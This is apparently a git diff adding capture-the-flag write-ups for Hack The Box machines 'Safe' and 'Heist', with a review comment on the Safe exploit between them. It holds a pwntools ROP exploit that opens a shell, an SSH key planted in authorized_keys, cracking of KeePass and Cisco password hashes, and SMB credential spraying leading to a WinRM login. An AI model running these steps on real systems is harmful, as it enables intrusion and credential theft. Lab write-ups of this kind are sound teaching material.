+ system = p64(0x40116e) # could also be 401040
+ pop_r13 = p64(0x401206) # later used as r13 (treat as rsp)
+ null = p64(0x0)
+ test = p64(0x401152) # RSP => RDI , JMP R13
+
+ #p.recvuntil('What do you want me to echo back ?')
+ p.sendline(junk + bin_sh + pop_r13 + system + null + null + test)
+ p.interactive()
+
+
+Looking at the last 2 lines, first we trigger the buffer overflow, then place in the bin_sh variable into the rsp register, then it is going to put the system memory location into r13, then going through the other 2 pops in that chain (with the 2 null bytes), to then finally return to test, therefore test will now execute it. p.interactive() will hopefully allow us to have an interactive shell onto the system.
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → python3 exploit.py
+ [+] Opening connection to 10.10.10.147 on port 1337: Done
+ [*] Switching to interactive mode
+ 04:58:56 up 18:49, 0 users, load average: 0.00, 0.00, 0.00
+ $ uname -a
+ Linux safe 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1 (2019-04-12) x86_64 GNU/Linux
+ $ cat /home/user/user.txt
+ 7aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the user flag :)
+
+## **Part 3 : Getting Root Access**
+
+Before we start to privesc, let's first upgrade our shell since gdb's shell is all weird we don't really know how to get a full TTY
+
+_Terminal 1:_
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → ssh-keygen -f safe
+ Generating public/private rsa key pair.
+ Enter passphrase (empty for no passphrase):
+ Enter same passphrase again:
+ Your identification has been saved in safe.
+ Your public key has been saved in safe.pub.
+ The key fingerprint is:
+ SHA256:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX root@prometheus
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → chmod 600 safe
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/Ghidra]
+ → cat safe.pub
+ ssh-rsa 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 root@prometheus
+
+
+_Terminal 2:_
+
+
+ $ echo 'N2AIR+8K1G0jVaRVMYF5os/0UbTK4pd/xXPqV8WrW4GmK4ntZoa3DCTBkeUPDveOo2i/0Fmwhj9pEFFb7/i4DlM5FwVqbowOmm8AhSXc3QuwlyV+7k8WRWPUGPWf6UCNWo4AUUAKRZvcqmEEx4uft7GjQNiKqn8X+jVanbb2UXqSyA7bPYh5336o/1lluvhUuXVX7MmMh2wbcbMz/gamxIaGI6NDByTl8pls/hcjstoPRVearRji69HlCZcRrJVZ2rf5SPLpAROUmJdHR1L6HYxVWtdvq1VWAUzkwTCWH6FDpJChAMuJeSt6pdG1OjET+KD38VaBlHQujD4lWOANEAlttV1+3o3zvbCEqOrNsag3+hqcFk5rWk9P/Bh1WkI+vOwioslFxckKmt/RcA/4wcNHkYv/0ezr59lrBGVax7RhtZbPc= root@prometheus' > /home/user/.ssh/authorized_keys
+
+
+_Terminal 1:_
+
+
+
+
+
+_Terminal 2:_
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → scp -i ../Ghidra/safe user@10.10.10.147:MyPasswords.kdbx .
+ MyPasswords.kdbx 100% 2446 24.1KB/s 00:00
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → scp -i ../Ghidra/safe user@10.10.10.147:IMG_0547.JPG .
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → ls
+ MyPasswords.kdbx
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → file MyPasswords.kdbx
+ MyPasswords.kdbx: Keepass password database 2.x KDBX
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → file IMG_0547.JPG
+ IMG_0547.JPG: JPEG image data, baseline, precision 8, 3264x2448, components 3
+
+
+
+So here we have downloaded two of the files we need to privesc. one is a .kdbx file and the other is an image.
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g"
+ IMG_0547.JPG:$keepass$*2*60000*0*a9d7b3ab261d3d2bc18056e5052938006b72632366167bcb0b3b0ab7f272ab07*9a700a89b1eb5058134262b2481b571c8afccff1d63d80b409fa5b2568de4817*36079dc6106afe013411361e5022c4cb*f4e75e393490397f9a928a3b2d928771a09d9e6a750abd9ae4ab69f85f896858*78ad27a0ed11cddf7b3577714b2ee62cfa94e21677587f3204a2401fddce7a96
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g" > keepass_hash
+
+
+from here we have our keepass hash, let's crack it with john and rockyou.txt
+
+
+ λ root [ 10.10.14.10/23 ] [_HTB/Safe/files]
+ → john -w:/usr/share/wordlists/rockyou.txt keepass_hash
+ Created directory: /root/.john
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (KeePass [SHA256 AES 32/64])
+ Cost 1 (iteration count) is 60000 for all loaded hashes
+ Cost 2 (version) is 2 for all loaded hashes
+ Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ bullshit (MyPasswords)
+
+
+Good choice for a master password
+
+
+
+
+ user@safe:~$ su
+ Password:
+ root@safe:/home/user# uname -a
+ Linux safe 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1 (2019-04-12) x86_64 GNU/Linux
+ root@safe:/home/user# cat /root/root.txt
+ d7XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to escalate privileges and print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
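Review bot: the first exploit.py in this hunk cannot run as written: `junk` is assigned but the send line reads `p.sendline(j + call_main)`, so `j` raises a NameError, and `p.recvuntil('What do you want me to echo back ?')` waits for a prompt with a space before the `?` while the binary prints `What do you want me to echo back? `, so the script would block before sending anything. Suggest `p.sendline(junk + call_main)` and `p.recvuntil(b'What do you want me to echo back? ')` (bytes literals are the safer form with pwntools on Python 3). The offset figures also disagree: `pattern search $rsp` reports offset 120 and the prose says "a pattern of 120 Xs, 8 Ys and 8 Zs", but the command is `print "X"*128 + "Y"*8 + "Z"*8`; the register dump (`$rsp → "XXXXXXXXYYYYYYYYZZZZZZZZ"`) confirms the return address sits at offset 120, and the later `"A" * 112` plus the 8-byte `bin_sh` is consistent with 120, so the 128 should be corrected or explained. The final chain relies on two addresses the hunk never derives: `0x401206` (commented as `pop r13, pop, pop`) appears only in the script header, and the `objdump -D myapp | grep -i test` output shows `0000000000401152 :` with no disassembly, so a reader cannot verify the `RSP => RDI , JMP R13` comment; include the disassembly of `test` and of the gadget at 0x401206. Smaller gaps in Part 3: the second `_Terminal 1:_` block is empty (the ssh login with the new key is missing), the `ls` output lists only MyPasswords.kdbx although IMG_0547.JPG was just copied, `sed "s/MyPasswords/IMG_0547.JPG/g"` only relabels the hash and does not feed the image in as a key file (keepass2john's `-k` option does that), the john output still shows `(MyPasswords)` despite that relabel, and the `su` to root gives no indication where the root password came from (presumably the opened database, but nothing from it is shown).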
diff --git a/Easy/36.md b/Easy/36.md
new file mode 100644
index 0000000..66be90a
--- /dev/null
+++ b/Easy/36.md
@@ -0,0 +1,698 @@
+# Heist Writeup
+
+
+
+## Heist Introduction :
+
+Heist is an easy Windows box that was released back in August 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~]
+ → nmap -F 10.10.10.149
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 08:26 GMT
+ Nmap scan report for 10.10.10.149
+ Host is up (0.098s latency).
+ Not shown: 97 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 135/tcp open msrpc
+ 445/tcp open microsoft-ds
+
+ Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds
+
+ λ nihilist [ 10.10.14.7/23 ] [~]
+ → nmap -sCV -p80,135,445 10.10.10.149
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-18 08:28 GMT
+ Nmap scan report for 10.10.10.149
+ Host is up (0.11s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 10.0
+ | http-cookie-flags:
+ | /:
+ | PHPSESSID:
+ |_ httponly flag not set
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/10.0
+ | http-title: Support Login Page
+ |_Requested resource was login.php
+ 135/tcp open msrpc Microsoft Windows RPC
+ 445/tcp open microsoft-ds?
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: 57s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2020-02-18T08:30:02
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 65.57 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up the http service on port 80 so let's see what we are dealing with. http://10.10.10.149/login.php and we navigate over to issues.php
+
+ 
+
+
+ version 12.2
+ no service pad
+ service password-encryption
+ !
+ isdn switch-type basic-5ess
+ !
+ hostname ios-1
+ !
+ security passwords min-length 12
+ enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
+ !
+ username rout3r password 7 0242114B0E143F015F5D1E161713
+ username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
+ !
+ !
+ ip ssh authentication-retries 5
+ ip ssh version 2
+ !
+ !
+ router bgp 100
+ synchronization
+ bgp log-neighbor-changes
+ bgp dampening
+ network 192.168.0.0Â mask 300.255.255.0
+ timers bgp 3 9
+ redistribute connected
+ !
+ ip classless
+ ip route 0.0.0.0 0.0.0.0 192.168.0.1
+ !
+ !
+ access-list 101 permit ip any any
+ dialer-list 1 protocol ip list 101
+ !
+ no ip http server
+ no ip http secure-server
+ !
+ line vty 0 4
+ session-timeout 600
+ authorization exec SSH
+ transport input ssh
+
+
+
+Here we have a cisco router config, with 2 type 7 passwords, so we'll use [this python script](https://github.com/theevilbit/ciscot7) to decrypt them. As for the type 5 password we'll just use hashcat in combination with rockyou.txt to find the password.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → git clone https://github.com/theevilbit/ciscot7
+ Cloning into 'ciscot7'...
+ remote: Enumerating objects: 4, done.
+ remote: Counting objects: 100% (4/4), done.
+ remote: Compressing objects: 100% (4/4), done.
+ remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 15
+ Unpacking objects: 100% (19/19), 6.73 KiB | 574.00 KiB/s, done.
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → cd ciscot7
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ✔
+ → ls [21af318]
+ ciscot7.py LICENSE.md README.md
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ✔
+ → python ciscot7.py -p 0242114B0E143F015F5D1E161713 [21af318]
+ Decrypted password: $uperP@ssword
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ✔
+ → python ciscot7.py -p 02375012182C1A1D751618034F36415408 [21af318]
+ Decrypted password: Q4)sJu\Y8qz*A3?d
+
+
+now that we have the two type 7 passwords, we'll try to get the type 5 password using hashcat and rockyou.txt
+
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ✔
+ → echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' >> cis.md5 [21af318]
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ?
+ → cat cis.md5 [21af318]
+ $1$pdQG$o8nrSzsGXeaduXrjlvKc91
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ?
+ → hashcat -m 500 [21af318]
+ Usage: hashcat [options]... hash|hashfile|hccapxfile [dictionary|mask|directory]...
+
+ Try --help for more help.
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/ciscot7] at master ?
+ → hashcat -m 500 cis.md5 /usr/share/wordlists/rockyou.txt [21af318]
+
+
+This takes some time to run, but we get the password "stealth1agent"
+
+ * rout3r:$uperP@ssword
+ * admin:Q4)sJu\Y8qz*A3?d
+ * secret:stealth1agent
+
+
+
+other than those credentials, we have potential usernames : Hazard
+
+In other words, we have 4 possible usernames, and 3 possible passwords, let's create users.txt and pass.txt , in order to use crackmapexec on the shares our nmap scan picked up earlier.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → nano users.txt
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → nano pass.txt
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt
+ SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\hazard:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [+] SUPPORTDESK\hazard:stealth1agent
+ SMB 10.10.10.149 445 SUPPORTDESK [+] Enumerated shares
+ SMB 10.10.10.149 445 SUPPORTDESK Share Permissions Remark
+ SMB 10.10.10.149 445 SUPPORTDESK ----- ----------- ------
+ SMB 10.10.10.149 445 SUPPORTDESK ADMIN$ Remote Admin
+ SMB 10.10.10.149 445 SUPPORTDESK C$ Default share
+ SMB 10.10.10.149 445 SUPPORTDESK IPC$ READ Remote IPC
+
+
+We get matching credentials for hazard:stealth1agent ! Let's fire up the metasploit database and then launch msfconsole to see what we can do from there.
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Heist]
+ → msfdb init
+ [+] Starting database
+ [+] Creating database user 'msf'
+ [+] Creating databases 'msf'
+ [+] Creating databases 'msf_test'
+ [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
+ [+] Creating initial database schema
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Heist]
+ → msfconsole
+
+ msf5 > creds
+ Credentials
+ ===========
+
+ host origin service public private realm private_type JtR Format
+ ---- ------ ------- ------ ------- ----- ------------ ----------
+
+ msf5 > use auxiliary/scanner/smb/smb_login
+ msf5 auxiliary(scanner/smb/smb_login) > setg USER_FILE user.txt
+ USER_FILE => user.txt
+ msf5 auxiliary(scanner/smb/smb_login) > setg PASS_FILE pass.txt
+ PASS_FILE => pass.txt
+ msf5 auxiliary(scanner/smb/smb_login) > setg RHOSTS 10.10.10.149
+ RHOSTS => 10.10.10.149
+ msf5 auxiliary(scanner/smb/smb_login) > run
+
+
+we can also run this and we would get the same results as the python script we ran before, matching hazard:stealth1agent, for this next section we'll use impacket scripts to continue with our enumeration process
+
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Heist]
+ → locate psexec.py
+ /usr/share/doc/python3-impacket/examples/psexec.py
+ /usr/share/set/src/fasttrack/psexec.py
+
+ λ root [ 10.10.14.7/23 ] [nihilist/_HTB/Heist]
+ → cd /usr/share/doc/python3-impacket/examples/
+
+ λ root [ 10.10.14.7/23 ] [doc/python3-impacket/examples]
+ → ls
+ atexec.py getST.py mimikatz.py opdump.py rpcdump.py smbserver.py
+ dcomexec.py getTGT.py mqtt_check.py ping6.py sambaPipe.py sniffer.py
+ dpapi.py GetUserSPNs.py mssqlclient.py ping.py samrdump.py sniff.py
+ esentutl.py goldenPac.py mssqlinstance.py psexec.py secretsdump.py split.py
+ GetADUsers.py ifmap.py netview.py raiseChild.py services.py ticketer.py
+ getArch.py karmaSMB.py nmapAnswerMachine.py rdp_check.py smbclient.py wmiexec.py
+ GetNPUsers.py kintercept.py ntfs-read.py registry-read.py smbexec.py wmipersist.py
+ getPac.py lookupsid.py ntlmrelayx.py reg.py smbrelayx.py wmiquery.py
+
+ λ root [ 10.10.14.7/23 ] [doc/python3-impacket/examples]
+ → python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149
+
+
+The above command is going to run a RID/SID bruteforce which is going to give us more usernames
+
+
+ λ root [ 10.10.14.7/23 ] [doc/python3-impacket/examples]
+ → python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149
+ Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
+
+ [*] Brute forcing SIDs at 10.10.10.149
+ [*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
+ [*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
+ 500: SUPPORTDESK\Administrator (SidTypeUser)
+ 501: SUPPORTDESK\Guest (SidTypeUser)
+ 503: SUPPORTDESK\DefaultAccount (SidTypeUser)
+ 504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
+ 513: SUPPORTDESK\None (SidTypeGroup)
+ 1008: SUPPORTDESK\Hazard (SidTypeUser)
+ 1009: SUPPORTDESK\support (SidTypeUser)
+ 1012: SUPPORTDESK\Chase (SidTypeUser)
+ 1013: SUPPORTDESK\Jason (SidTypeUser)
+
+
+And we're getting interesting results ! we have a few more possible usernames to add to our users.txt file
+
+
+ secret
+ admin
+ rout3r
+ hazard
+ support
+ chase
+ jason
+
+
+running crackmapexec again, we are getting other matching credentials :
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt
+ SMB 10.10.10.149 445 SUPPORTDESK [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\secret:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\admin:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\rout3r:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\support:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\support:stealth1agent STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [-] SUPPORTDESK\chase:$uperP@ssword STATUS_LOGON_FAILURE
+ SMB 10.10.10.149 445 SUPPORTDESK [+] SUPPORTDESK\chase:Q4)sJu\Y8qz*A3?d
+
+
+Now that we have our matching credentials : chase:Q4)sJu\Y8qz*A3?d let's use evil-winrm to login.
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → git clone https://github.com/Hackplayers/evil-winrm
+ Cloning into 'evil-winrm'...
+ remote: Enumerating objects: 65, done.
+ remote: Counting objects: 100% (65/65), done.
+ remote: Compressing objects: 100% (54/54), done.
+ remote: Total 765 (delta 33), reused 27 (delta 11), pack-reused 700
+ Receiving objects: 100% (765/765), 1.97 MiB | 485.00 KiB/s, done.
+ Resolving deltas: 100% (438/438), done.
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/Heist]
+ → cd evil-winrm
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ✔
+ → cat Gemfile [e501272]
+ source 'https://rubygems.org'
+
+ gem 'winrm'
+ gem 'winrm-fs'
+ gem 'stringio'
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ✔
+ → gem install winrm winrm-fs stringio [e501272]
+ Fetching: builder-3.2.4.gem (100%)
+ ERROR: While executing gem ... (Gem::FilePermissionError)
+ You don't have write permissions for the /var/lib/gems/2.5.0 directory.
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ✔
+ → sudo !! [e501272]
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ✔
+ → sudo gem install winrm winrm-fs stringio [e501272]
+ [sudo] password for nihilist:
+
+
+Once that's done, run the ruby script as follows:
+
+
+ λ nihilist [ 10.10.14.7/23 ] [_HTB/Heist/evil-winrm] at master ✔
+ → ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i 10.10.10.149 [e501272]
+
+ Evil-WinRM shell v2.3
+
+ Info: Establishing connection to remote endpoint
+
+ *Evil-WinRM* PS C:\Users\Chase\Documents>
+
+
+And we are logged in as the Chase user!
+
+
+ *Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
+ *Evil-WinRM* PS C:\Users\Chase> gci -recurse . | select fullname
+
+ FullName
+ --------
+ C:\Users\Chase\3D Objects
+ C:\Users\Chase\Contacts
+ C:\Users\Chase\Desktop
+ C:\Users\Chase\Documents
+ C:\Users\Chase\Downloads
+ C:\Users\Chase\Favorites
+ C:\Users\Chase\Links
+ C:\Users\Chase\Music
+ C:\Users\Chase\Pictures
+ C:\Users\Chase\Saved Games
+ C:\Users\Chase\Searches
+ C:\Users\Chase\Videos
+ C:\Users\Chase\Desktop\todo.txt
+ C:\Users\Chase\Desktop\user.txt
+ C:\Users\Chase\Favorites\Links
+ C:\Users\Chase\Favorites\Bing.url
+ C:\Users\Chase\Links\Desktop.lnk
+ C:\Users\Chase\Links\Downloads.lnk
+
+ *Evil-WinRM* PS C:\Users\Chase> type Desktop\user.txt
+ a1XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+and that's it ! we have been able to print out the user flag :)
+
+## **Part 3 : Getting Root Access**
+
+In order to privesc, let's check out the files we can view beforehand.
+
+
+ *Evil-WinRM* PS C:\Users\Chase> cd Desktop
+ *Evil-WinRM* PS C:\Users\Chase\Desktop> type todo.txt
+ Stuff to-do:
+ 1. Keep checking the issues list.
+ 2. Fix the router config.
+
+ Done:
+ 1. Restricted access for guest user.
+
+
+looks like they had to fix the router config, as we saw earlier in the issues.php webpage on the http service running on port 80.
+
+
+ *Evil-WinRM* PS C:\Users> cd Hazard
+ *Evil-WinRM* PS C:\Users\Hazard> dir
+ Access to the path 'C:\Users\Hazard' is denied.
+ At line:1 char:1
+ + dir
+ + ~~~
+ + CategoryInfo : PermissionDenied: (C:\Users\Hazard:String) [Get-ChildItem], UnauthorizedAccessException
+ + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
+
+
+checking out hazard's user directory, we get permissions denied. We know there is a webserver, so let's enumerate it.
+
+
+ *Evil-WinRM* PS C:\> cd inetpub
+ *Evil-WinRM* PS C:\inetpub> cd wwwroot
+ *Evil-WinRM* PS C:\inetpub\wwwroot> dir
+ Access to the path 'C:\inetpub\wwwroot' is denied.
+ At line:1 char:1
+ + dir
+ + ~~~
+ + CategoryInfo : PermissionDenied: (C:\inetpub\wwwroot:String) [Get-ChildItem], UnauthorizedAccessException
+ + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
+ *Evil-WinRM* PS C:\inetpub\wwwroot>
+
+
+Weird, we don't have permissions to see what files are there in the wwwroot directory, although we know for a fact that index.php, login.php ,issues.php are there. Let's check out the most interesting one : login.php
+
+
+ session_start();
+ if( isset($_REQUEST['login']) && !empty($_REQUEST['login_username']) && !empty($_REQUEST['login_password'])) {
+ if( $_REQUEST['login_username'] === 'admin@support.htb' && hash( 'sha256', $_REQUEST['login_password']) === '91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040') {
+ $_SESSION['admin'] = "valid";
+ header('Location: issues.php');
+ }
+ else
+ header('Location: errorpage.php');
+ }
+ else if( isset($_GET['guest']) ) {
+ if( $_GET['guest'] === 'true' ) {
+ $_SESSION['guest'] = "valid";
+ header('Location: issues.php');
+ }
+ }
+
+
+Looking at the results, we see a few interesting information : admin@support.htb, and a hash sha256 91c077fb5bcdd1eacf7268c945bc1d1ce2faf9634cba615337adbf0af4db9040. So navigating over to [hashes.org](hashes.org/search.php) we paste our hash and see that sadly, hashes.org can't find it for us, so we navigate over to the attachments directory
+
+
+ *Evil-WinRM* PS C:\inetpub\wwwroot> cd attachments
+ *Evil-WinRM* PS C:\inetpub\wwwroot\attachments> gci
+
+
+ Directory: C:\inetpub\wwwroot\attachments
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 4/21/2019 1:02 PM 780 config.txt
+
+
+this is the config.txt we found earlier, but since we don't have the writing rights to put our reverse shell in here, let's try to enumerate the machine a little further.
+
+
+ *Evil-WinRM* PS C:\inetpub\wwwroot\attachments> cd /
+ *Evil-WinRM* PS C:\> gci
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 4/21/2019 5:33 PM inetpub
+ d----- 9/15/2018 12:49 PM PerfLogs
+ d-r--- 8/27/2019 3:00 PM Program Files
+ d----- 4/22/2019 6:56 AM Program Files (x86)
+ d-r--- 4/22/2019 7:26 AM Users
+ d----- 8/27/2019 3:01 PM Windows
+
+
+ *Evil-WinRM* PS C:\> cd "Program Files"
+ *Evil-WinRM* PS C:\Program Files> gci
+
+
+ Directory: C:\Program Files
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 4/21/2019 9:39 AM Common Files
+ d----- 4/21/2019 11:00 AM internet explorer
+ d----- 4/22/2019 6:56 AM Mozilla Firefox
+ d----- 4/22/2019 6:47 AM PHP
+ d----- 4/22/2019 6:46 AM Reference Assemblies
+ d----- 4/22/2019 6:46 AM runphp
+ d----- 8/27/2019 3:00 PM VMware
+ d-r--- 4/21/2019 11:00 AM Windows Defender
+ d----- 4/21/2019 11:00 AM Windows Defender Advanced Threat Protection
+ d----- 9/15/2018 12:49 PM Windows Mail
+ d----- 4/21/2019 11:00 AM Windows Media Player
+ d----- 9/15/2018 12:49 PM Windows Multimedia Platform
+ d----- 9/15/2018 12:58 PM windows nt
+ d----- 4/21/2019 11:00 AM Windows Photo Viewer
+ d----- 9/15/2018 12:49 PM Windows Portable Devices
+ d----- 9/15/2018 12:49 PM Windows Security
+ d----- 9/15/2018 12:49 PM WindowsPowerShell
+
+
+We see that Firefox is installed, let's see if firefox is running using Get-Process
+
+
+ *Evil-WinRM* PS C:\Program Files> Get-Process
+
+ Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
+ ------- ------ ----- ----- ------ -- -- -----------
+ 445 17 2268 5632 416 0 csrss
+ 293 17 2288 5216 500 1 csrss
+ 358 15 3488 14520 5244 1 ctfmon
+ 257 14 4144 13504 3988 0 dllhost
+ 166 9 1880 9812 0.61 6596 1 dllhost
+ 619 32 33752 59888 372 1 dwm
+ 1491 58 23660 78168 5624 1 explorer
+ 1129 69 118928 157936 28.55 2204 1 firefox
+ 343 20 9980 37448 0.50 6272 1 firefox
+ 408 31 16888 62536 1.34 6516 1 firefox
+ 390 30 30596 64112 42.83 6860 1 firefox
+ 358 26 16348 37612 0.69 7020 1 firefox
+
+
+From there, we need to processdump one of the firefox processes, to do so we'll use sysinternals
+
+_Terminal 2:_
+
+
